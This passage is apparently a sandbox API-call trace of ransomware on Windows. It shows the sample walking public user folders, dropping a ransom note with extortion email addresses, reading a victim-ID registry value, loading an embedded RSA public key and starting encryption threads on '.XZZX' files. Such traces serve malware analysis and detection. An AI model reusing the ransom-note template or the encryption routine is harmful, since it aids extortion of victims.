lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\Public\\Documents\\My Music") returned="C:\\Users\\Public\\Documents\\My Music" [0208.641] SetErrorMode (uMode=0x1) returned 0x1 [0208.641] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Documents\\My Music" | out: lpString1="C:\\Users\\Public\\Documents\\My Music") returned="C:\\Users\\Public\\Documents\\My Music" [0208.641] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\") returned="C:\\Users\\Public\\Documents\\My Music\\" [0208.641] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Documents\\My Music\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\") returned="C:\\Users\\Public\\Documents\\My Music\\" [0208.641] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\*.*") returned="C:\\Users\\Public\\Documents\\My Music\\*.*" [0208.641] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0208.641] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0208.642] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Documents\\My Music" | out: lpString1="C:\\Users\\Public\\Documents\\My Music") returned="C:\\Users\\Public\\Documents\\My Music" [0208.642] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\*.*") returned="C:\\Users\\Public\\Documents\\My Music\\*.*" [0208.642] SetErrorMode (uMode=0x1) returned 0x1 [0208.642] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Documents\\My Music\\_HELP_INSTRUCTION.TXT") returned 56 [0208.642] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0208.642] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0208.642] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xf30) returned 0x0 [0208.642] RegQueryValueExW (in: hKey=0xf30, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4381e18, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x4381e18*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0208.642] RegCloseKey (hKey=0xf30) returned 0x0 [0208.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0208.642] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0208.642] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\documents\\my music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf30 [0208.642] CloseHandle (hObject=0xf30) returned 1 [0208.642] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0208.642] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0208.642] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0208.642] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0208.642] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0208.642] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0208.642] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\" [0208.642] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures" [0208.643] SetErrorMode (uMode=0x1) returned 0x1 [0208.643] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Documents\\My Pictures" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures" [0208.643] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\") returned="C:\\Users\\Public\\Documents\\My Pictures\\" [0208.643] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Documents\\My Pictures\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\") returned="C:\\Users\\Public\\Documents\\My Pictures\\" [0208.643] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\*.*") returned="C:\\Users\\Public\\Documents\\My Pictures\\*.*" [0208.643] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0208.643] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0208.643] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Documents\\My Pictures" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures" [0208.643] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\*.*") returned="C:\\Users\\Public\\Documents\\My Pictures\\*.*" [0208.643] SetErrorMode (uMode=0x1) returned 0x1 [0208.643] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT") returned 59 [0208.643] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0208.643] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0208.643] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xf30) returned 0x0 [0208.643] RegQueryValueExW (in: hKey=0xf30, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4367e90, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x4367e90*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0208.643] RegCloseKey (hKey=0xf30) returned 0x0 [0208.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0208.643] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0208.643] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\documents\\my pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf30 [0208.643] CloseHandle (hObject=0xf30) returned 1 [0208.643] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0208.644] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0208.644] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0208.644] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0208.644] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0208.644] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0208.644] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\" [0208.644] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos") returned="C:\\Users\\Public\\Documents\\My Videos" [0208.644] SetErrorMode (uMode=0x1) returned 0x1 [0208.644] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Documents\\My Videos" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos") returned="C:\\Users\\Public\\Documents\\My Videos" [0208.644] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\") returned="C:\\Users\\Public\\Documents\\My Videos\\" [0208.644] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Documents\\My Videos\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\") returned="C:\\Users\\Public\\Documents\\My Videos\\" [0208.644] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\*.*") returned="C:\\Users\\Public\\Documents\\My Videos\\*.*" [0208.644] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0208.644] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0208.644] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Documents\\My Videos" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos") returned="C:\\Users\\Public\\Documents\\My Videos" [0208.644] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\*.*") returned="C:\\Users\\Public\\Documents\\My Videos\\*.*" [0208.644] SetErrorMode (uMode=0x1) returned 0x1 [0208.644] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT") returned 57 [0208.644] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0208.644] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0208.644] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xf30) returned 0x0 [0208.644] RegQueryValueExW (in: hKey=0xf30, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43680c0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43680c0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0208.645] RegCloseKey (hKey=0xf30) returned 0x0 [0208.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0208.645] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0208.645] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\documents\\my videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf30 [0208.645] CloseHandle (hObject=0xf30) returned 1 [0208.645] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0208.645] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0208.645] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0208.645] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0208.645] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0208.645] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0208.645] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0208.645] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0208.645] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0208.645] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0208.645] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0208.645] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Downloads" | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0208.645] SetErrorMode (uMode=0x1) returned 0x1 [0208.645] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Downloads" | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0208.645] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Downloads\\") returned="C:\\Users\\Public\\Downloads\\" [0208.645] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Downloads\\" | out: lpString1="C:\\Users\\Public\\Downloads\\") returned="C:\\Users\\Public\\Downloads\\" [0208.645] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Downloads\\*.*") returned="C:\\Users\\Public\\Downloads\\*.*" [0208.645] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0208.645] PathFindFileNameW (pszPath="C:\\Users\\Public\\Downloads") returned="Downloads" [0208.646] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0208.646] StrStrW (lpFirst="BC1D727A30ED2409A03B25C6350E0851.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0208.646] StrStrW (lpFirst="BC1D727A30ED2409A03B25C6350E0851.XZZX", lpSrch="ntldr") returned 0x0 [0208.646] StrStrW (lpFirst="BC1D727A30ED2409A03B25C6350E0851.XZZX", lpSrch="NTLDR") returned 0x0 [0208.646] StrStrW (lpFirst="BC1D727A30ED2409A03B25C6350E0851.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0208.646] StrStrW (lpFirst="BC1D727A30ED2409A03B25C6350E0851.XZZX", lpSrch="ntdetect.com") returned 0x0 [0208.646] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Downloads\\") returned 30 [0208.646] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Downloads\\") [0208.646] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0208.646] lstrcpyW (in: lpString1=0x17cf1c, lpString2="BC1D727A30ED2409A03B25C6350E0851.XZZX" | out: lpString1="BC1D727A30ED2409A03B25C6350E0851.XZZX") returned="BC1D727A30ED2409A03B25C6350E0851.XZZX" [0208.646] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads\\") returned="\\\\?\\C:\\Users\\Public\\Downloads\\" [0208.646] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf34 [0208.646] Sleep (dwMilliseconds=0x96) [0208.796] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0208.796] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0208.796] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0208.796] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0208.796] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0208.796] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0208.796] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0208.796] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Downloads" | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0208.796] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Downloads\\*.*") returned="C:\\Users\\Public\\Downloads\\*.*" [0208.796] SetErrorMode (uMode=0x1) returned 0x1 [0208.796] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Downloads\\_HELP_INSTRUCTION.TXT") returned 47 [0208.796] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0208.796] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0208.796] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xf38) returned 0x0 [0208.796] RegQueryValueExW (in: hKey=0xf38, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43682f0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43682f0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0208.796] RegCloseKey (hKey=0xf38) returned 0x0 [0208.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0208.797] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0208.797] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\downloads\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf38 [0208.797] CloseHandle (hObject=0xf38) returned 1 [0208.797] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0208.797] PathFindFileNameW (pszPath="C:\\Users\\Public\\Downloads") returned="Downloads" [0208.797] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0208.797] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0208.797] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0208.797] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Favorites" | out: lpString1="C:\\Users\\Public\\Favorites") returned="C:\\Users\\Public\\Favorites" [0208.797] SetErrorMode (uMode=0x1) returned 0x1 [0208.797] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Favorites" | out: lpString1="C:\\Users\\Public\\Favorites") returned="C:\\Users\\Public\\Favorites" [0208.797] lstrcatW (in: lpString1="C:\\Users\\Public\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Favorites\\") returned="C:\\Users\\Public\\Favorites\\" [0208.797] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Favorites\\" | out: lpString1="C:\\Users\\Public\\Favorites\\") returned="C:\\Users\\Public\\Favorites\\" [0208.797] lstrcatW (in: lpString1="C:\\Users\\Public\\Favorites\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Favorites\\*.*") returned="C:\\Users\\Public\\Favorites\\*.*" [0208.797] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0208.797] PathFindFileNameW (pszPath="C:\\Users\\Public\\Favorites") returned="Favorites" [0208.797] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0208.797] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0208.797] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0208.797] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0208.797] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0208.798] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Favorites" | out: lpString1="C:\\Users\\Public\\Favorites") returned="C:\\Users\\Public\\Favorites" [0208.798] lstrcatW (in: lpString1="C:\\Users\\Public\\Favorites", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Favorites\\*.*") returned="C:\\Users\\Public\\Favorites\\*.*" [0208.798] SetErrorMode (uMode=0x1) returned 0x1 [0208.798] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Favorites\\_HELP_INSTRUCTION.TXT") returned 47 [0208.798] GetUserNameW (in: 